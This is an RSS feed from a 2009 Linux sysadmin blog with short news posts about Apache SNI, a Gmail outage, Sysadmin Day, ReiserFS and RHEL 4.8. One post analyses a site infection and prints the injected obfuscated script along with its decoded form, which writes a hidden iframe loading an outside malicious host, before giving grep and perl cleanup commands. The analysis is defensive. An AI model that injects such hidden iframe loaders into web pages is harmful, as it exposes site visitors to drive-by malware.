<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Linux System Admins Blog &#187; News</title>
	<atom:link href="http://linuxsysadminblog.com/category/news/feed/" rel="self" type="application/rss+xml" />
	<link>http://linuxsysadminblog.com</link>
	<description>System admins of Promet - an e-commerce, high availability Open Source web shop - share their findings</description>
	<lastBuildDate>Sat, 10 Jul 2010 01:33:47 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Apache Now Supports Multiple SSL on Single IP Address</title>
		<link>http://linuxsysadminblog.com/2009/11/apache-now-supports-multiple-ssl-on-single-ip-address/</link>
		<comments>http://linuxsysadminblog.com/2009/11/apache-now-supports-multiple-ssl-on-single-ip-address/#comments</comments>
		<pubDate>Tue, 24 Nov 2009 06:08:23 +0000</pubDate>
		<dc:creator>gerold</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[ssl]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=999</guid>
		<description><![CDATA[With the release of Apache 2.2.12, we can now configure multiple SSL sites in one IP address.  It is available of you have Server Name Indication (SNI) extension for OpenSSL.  Visit TechRepublic&#8217;s post on &#8220;Configure Apache to support multiple SSL sites on a single IP address&#8221; for details and vhost sample configuration.  [...]]]></description>
			<content:encoded><![CDATA[<p>With the release of Apache 2.2.12, we can now configure multiple SSL sites in one IP address.  It is available of you have Server Name Indication (SNI) extension for OpenSSL.  Visit TechRepublic&#8217;s post on &#8220;<a href="http://blogs.techrepublic.com.com/opensource/?p=987">Configure Apache to support multiple SSL sites on a single IP address</a>&#8221; for details and vhost sample configuration.  And for complete reference please refer to this page &#8220;<a href="http://wiki.apache.org/httpd/NameBasedSSLVHostsWithSNI">SSL with Virtual Hosts Using SNI</a>&#8221; and <a href="http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslstrictsnivhostcheck">Apache mod_ssl documentation</a>.</p>
<p>We&#8217;ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a dedicated ip address.  <img src='http://linuxsysadminblog.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/11/apache-now-supports-multiple-ssl-on-single-ip-address/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google webmail bites it.</title>
		<link>http://linuxsysadminblog.com/2009/09/google-webmail-bites-it/</link>
		<comments>http://linuxsysadminblog.com/2009/09/google-webmail-bites-it/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 21:33:10 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[mail]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=850</guid>
		<description><![CDATA[Google webmail is down people&#8230;
However mail can be retrieved and sent via IMAP/POP and SMTP. Fire up your favourite email client (I like Mozilla Thunderbird) in the meantime.
]]></description>
			<content:encoded><![CDATA[<p>Google webmail is down people&#8230;</p>
<div id="attachment_855" class="wp-caption alignnone" style="width: 160px"><a rel="attachment wp-att-855" href="http://linuxsysadminblog.com/2009/09/google-webmail-bites-it/gmail_bites_it-3/"><img class="size-thumbnail wp-image-855" title="gmail_bites_it" src="http://linuxsysadminblog.com/wp-content/uploads/2009/09/gmail_bites_it2-150x150.png" alt="google webmail down" width="150" height="150" /></a><p class="wp-caption-text">google webmail down</p></div>
<p>However mail can be retrieved and sent via IMAP/POP and SMTP. Fire up your favourite email client (I like <a href="http://www.mozillamessaging.com/en-US/thunderbird/">Mozilla Thunderbird</a>) in the meantime.</p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/09/google-webmail-bites-it/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>System Admin Day &#8211; July 31st</title>
		<link>http://linuxsysadminblog.com/2009/07/july-31st-system-admin-day/</link>
		<comments>http://linuxsysadminblog.com/2009/07/july-31st-system-admin-day/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 18:41:14 +0000</pubDate>
		<dc:creator>andrew</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[sysadmin]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=822</guid>
		<description><![CDATA[We will celebrate the Linux System Administrator Appriciation day tomorrow.  Yes, there is such a thing, if its in wikipedia (wiki system administrator appreciation Day), than it must be true!
See what its all about here:
System Administrator Appreciation Day, also known as Sysadmin Day, SysAdminDay or SAAD, was created by system administrator Ted Kekatos. Kekatos was inspired to create [...]]]></description>
			<content:encoded><![CDATA[<p>We will celebrate the Linux System Administrator Appriciation day tomorrow.  Yes, there is such a thing, if its in wikipedia (<a href="http://en.wikipedia.org/wiki/System_Administrator_Appreciation_Day">wiki system administrator appreciation Day</a>), than it must be true!</p>
<p>See what its all about here:</p>
<blockquote><p><strong>System Administrator Appreciation Day</strong>, also known as <strong>Sysadmin Day</strong>, <strong>SysAdminDay</strong> or <strong>SAAD</strong>, was created by <a style="text-decoration: none; color: #002bb8; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; background-position: initial initial;" title="System administrator" href="http://en.wikipedia.org/wiki/System_administrator">system administrator</a> Ted Kekatos. Kekatos was inspired to create the special day by a <a style="text-decoration: none; color: #002bb8; background-image: none; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; background-position: initial initial;" title="Hewlett-Packard" href="http://en.wikipedia.org/wiki/Hewlett-Packard">Hewlett-Packard</a> magazine advertisement in which a system administrator is presented with flowers and fruit-baskets by grateful co-workers as thanks for installing new printers.</p></blockquote>
<p style="text-align: left;">
<p>Here is one of our own getting some appreciation from our colleagues.</p>
<div id="attachment_823" class="wp-caption alignleft" style="width: 310px"><img class="size-medium wp-image-823" title="LinuxSystemAdmin-gets-love-from-ladies" src="http://linuxsysadminblog.com/wp-content/uploads/2009/07/LinuxSystemAdmin-gets-love-from-ladies-300x225.jpg" alt="Max, our gets nominated as a favorite linux system administrator by some of his office fans" width="300" height="225" /><p class="wp-caption-text">Max, our gets nominated as a favorite linux system administrator by some of his office fans</p></div>
<p>So don&#8217;t forget to buy your system administrator a coffee, beer, donut, or whatever he prefers, and dont ask any stupid questions tomorrow.</p>
<p><strong>The system administrator song</strong></p>
<p><object width="480" height="392" data="http://flash.revver.com/player/1.0/player.swf?mediaId=5580&#038;affiliate=1722" type="application/x-shockwave-flash" id="revver558012489788006752409"><param name="Movie" value="http://flash.revver.com/player/1.0/player.swf?mediaId=5580&#038;affiliate=1722"></param><param name="FlashVars" value="allowFullScreen=true"></param><param name="AllowFullScreen" value="true"></param><param name="AllowScriptAccess" value="always"></param><embed type="application/x-shockwave-flash" src="http://flash.revver.com/player/1.0/player.swf?mediaId=5580&#038;affiliate=1722" pluginspage="http://www.macromedia.com/go/getflashplayer" allowScriptAccess="always" flashvars="allowFullScreen=true" allowfullscreen="true" height="392" width="480"></embed></object></p>
<p>And here is a link to another System administrator song from the UK</p>
<p>http://www.ukuug.org/sysadminday/</p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/07/july-31st-system-admin-day/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>When Open Source kills</title>
		<link>http://linuxsysadminblog.com/2009/05/when-open-source-kills/</link>
		<comments>http://linuxsysadminblog.com/2009/05/when-open-source-kills/#comments</comments>
		<pubDate>Wed, 27 May 2009 16:39:25 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Down Time]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[murder]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=702</guid>
		<description><![CDATA[RieserFS is a journalling filesystem that is excellent when dealing with small files under 4K in size. When used with tail-packing it is 10-15x faster then ext2/ext3. ReiserFS was first included in Linux kernel 2.4.1 and even used  as default filesystem in SUSE Enterprise Linux and others. What many may not know is that [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://en.wikipedia.org/wiki/ReiserFS">RieserFS</a> is a journalling filesystem that is excellent when dealing with small files under 4K in size. When used with <a href="http://en.wikipedia.org/wiki/Tail_packing">tail-packing</a> it is 10-15x faster then ext2/ext3. ReiserFS was first included in Linux kernel 2.4.1 and even used  as default filesystem in SUSE Enterprise Linux and others. What many may not know is that <a href="http://en.wikipedia.org/wiki/Hans_Reiser">Reiser killed</a>, LITERALLY. The man behind this filesystem has been convicted of second degree murder for killing his wife. While this isn&#8217;t exactly breaking new it just goes to show you that extroverted geeks have it in them.</p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/05/when-open-source-kills/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Red Hat Enterprise Linux 4.8 released</title>
		<link>http://linuxsysadminblog.com/2009/05/red-hat-enterprise-linux-48-released/</link>
		<comments>http://linuxsysadminblog.com/2009/05/red-hat-enterprise-linux-48-released/#comments</comments>
		<pubDate>Tue, 26 May 2009 08:04:20 +0000</pubDate>
		<dc:creator>marius</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[redhat]]></category>
		<category><![CDATA[releases]]></category>
		<category><![CDATA[rhel]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=690</guid>
		<description><![CDATA[With the 8th update of their venerable Red Hat Enterprise Linux 4 version (first released in February 2005), RedHat switches to &#8220;production 2 lifecycle phase&#8220;, where it helps customers transition to RHEL5. Ideally everyone will upgrade to rhel5 by the end of the year &#8211; Q4 2009 (in case not done already, this is a [...]]]></description>
			<content:encoded><![CDATA[<p>With the <strong>8th update</strong> of their venerable <strong>Red Hat Enterprise Linux 4</strong> version (<em>first released in February 200</em>5), RedHat switches to &#8220;<a href="http://press.redhat.com/2008/07/23/support-for-red-hat-enterprise-linux-improved-through-enhanced-product-life-cycle/" target="_blank">production 2 lifecycle phase</a>&#8220;, where it helps customers transition to <strong>RHEL5</strong>. Ideally everyone will upgrade to rhel5 by the <strong>end of the year &#8211; Q4 200</strong>9 (in case not done already, this is a good time to plan for this).</p>
<p><a href="http://www.redhat.com/security/updates/errata/"><img class="alignnone size-full wp-image-691" title="7years_4" src="http://linuxsysadminblog.com/wp-content/uploads/2009/05/7years_4.png" alt="7years_4" width="518" height="88" /></a></p>
<p>General Availability:     February 14, 2005<br />
End of Production 1 phase:     March 31, 2009<br />
End of Production 2 phase:     No earlier than Q4 of 2009<br />
End of Production 3 phase:     February 29, 2012</p>
<p>Key features in <strong>Red Hat Enterprise Linux 4.8</strong> include:</p>
<ul>
<li> Improved virtualization performance and scale</li>
<li> Improved Windows interoperability and file system support</li>
<li> General performance improvements</li>
<li> Storage and filesystem enhancements</li>
<li> Enhanced developer support</li>
</ul>
<p>For full details check out the <a href="http://press.redhat.com/2009/05/18/red-hat-enterprise-linux-4-8-now-available/" target="_blank">press release</a>.</p>
<p><em>Note: as usual, people using Centos4 will have to wait for a couple of weeks to have cento4.8 available for upgrade.</em></p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/05/red-hat-enterprise-linux-48-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LSI aquires 3ware® from AMCC</title>
		<link>http://linuxsysadminblog.com/2009/04/lsi-aquires-3ware%c2%ae-from-amcc/</link>
		<comments>http://linuxsysadminblog.com/2009/04/lsi-aquires-3ware%c2%ae-from-amcc/#comments</comments>
		<pubDate>Fri, 24 Apr 2009 17:50:54 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Storage]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=560</guid>
		<description><![CDATA[In an accouncement made yesterday LSI Corporation stated that it had entered into a definitive agreement with Applied Micro Circuits Corporation (AMCC) to acquire the assets and associated intellectual property of the 3ware® RAID adapter business. It has been about 5 years since AMCC aquired 3Ware Inc for roughly 150 millions dollars in cash and [...]]]></description>
			<content:encoded><![CDATA[<p>In an <a href="http://now.eloqua.com/e/es.aspx?s=793&amp;e=A3B04CDAD711452AAE30C28330C367B3&amp;elq=F3E2E27EAC1A44EAAF8765C376493879">accouncement</a> made yesterday LSI Corporation stated that it had entered into a definitive agreement with Applied Micro Circuits Corporation (AMCC) to acquire the assets and associated intellectual property of the 3ware® RAID adapter business. It has been about 5 years since AMCC aquired 3Ware Inc for roughly 150 millions dollars in cash and yesterday they sold 3Ware for about 20 million cash.</p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/04/lsi-aquires-3ware%c2%ae-from-amcc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HEUR:Trojan.Script.Iframe</title>
		<link>http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/</link>
		<comments>http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/#comments</comments>
		<pubDate>Sun, 22 Mar 2009 17:25:15 +0000</pubDate>
		<dc:creator>gerold</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://linuxsysadminblog.com/?p=432</guid>
		<description><![CDATA[One of my friend asked for help about virus appearing on his sites (mostly WordPress sites).  I checked it out and my Kaspersky Internet Security blocked the pages from loading, so i downloaded the files manually and scanned with Kaspersky to determine affected files.

I noticed that the affected files were PHP and HTML only and [...]]]></description>
			<content:encoded><![CDATA[<p>One of my friend asked for help about virus appearing on his sites (mostly WordPress sites).  I checked it out and my Kaspersky Internet Security blocked the pages from loading, so i downloaded the files manually and scanned with Kaspersky to determine affected files.</p>
<p style="padding-left: 120px;"><img class="aligncenter size-medium wp-image-443" title="virus2" src="http://linuxsysadminblog.com/wp-content/uploads/2009/03/virus2-220x300.gif" alt="virus2" width="220" height="300" /></p>
<p>I noticed that the affected files were PHP and HTML only and if you compare the code of the original WordPress files with the infected one you will see the difference.  Below are sample added codes/virus:</p>
<p><span id="more-432"></span></p>
<p>HTML files: <code>&lt;script type="text/javascript"&gt;eval(String.fromCharCode(118,97...50,55))&lt;/script&gt;</code><br />
PHP files:  <code>&lt;?php echo '&lt;script type="text/javascript"&gt;eval(String.fromCharCode(118,97...50,55))&lt;/script&gt;'; ?&gt;</code></p>
<p><strong>What it does</strong><br />
I&#8217;m not a virus expert and I&#8217;m curios on what this portion of code does so i looked at it.  In our case the resulting text add this portion of code to the html or php files:</p>
<p><code>var fggge3="si";<br />
var w345="pl";<br />
var re6="ank.";<br />
var rr="com";<br />
var a="if";<br />
var s="tt";<br />
document.write('&lt;'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one"&gt;');<br />
var t=00001217<br />
</code></p>
<p>and you can see it tries to load an iframe:</p>
<p><code>&lt;iframe src=http://siplank.com/qqp/ style=display:none&gt;</code></p>
<p><strong>Virus Removal</strong><br />
You can remove the virus by just deleting the code (sample above) on the affected files.  If you need to cleanup hundred of infected files (in our case more than 800) you can do the following:</p>
<p>- Get the list of infected files.  You can use grep to search for them<br />
<code>grep -Z -R "eval(String.fromCharCode(118,97,114" /path/to/site/* &gt;&gt; affected_file_list.txt</code><br />
- Delete the codes by using perl/sed commands.  Repeat the commands for every files.<br />
<code>perl -pi -e 's/\&lt;script type="text\/javascript"\&gt;eval\(String.fromCharCode\(118,97,114...51,51\)\)\&lt;\/script\&gt;//'  /path/to/affected/file.htm<br />
perl -pi -e "s/\&lt;\?php echo ''; \?\&gt;\&lt;\?php echo ''; \?\&gt;//"  /path/to/affected/file.php</code></p>
<p>Or create a bash/shell script to do the cleanup at once:<br />
<code><br />
while read line<br />
do<br />
perl -pi -e 's/\&lt;script type="text\/javascript"\&gt;eval\(String.fromCharCode\(118,97,114...51,51\)\)\&lt;\/script\&gt;//'  $line<br />
perl -pi -e "s/\&lt;\?php echo ''; \?\&gt;\&lt;\?php echo ''; \?\&gt;//"   $line<br />
done &lt; affected_file_list.txt<br />
</code></p>
<p>That&#8217;s all.</p>
<p>I don&#8217;t know how the attacker gained access to the files and inserted the codes because the file permissions are ok &#8211; maybe they gain ftp access.</p>
]]></content:encoded>
			<wfw:commentRss>http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/feed/</wfw:commentRss>
		<slash:comments>55</slash:comments>
		</item>
	</channel>
</rss>
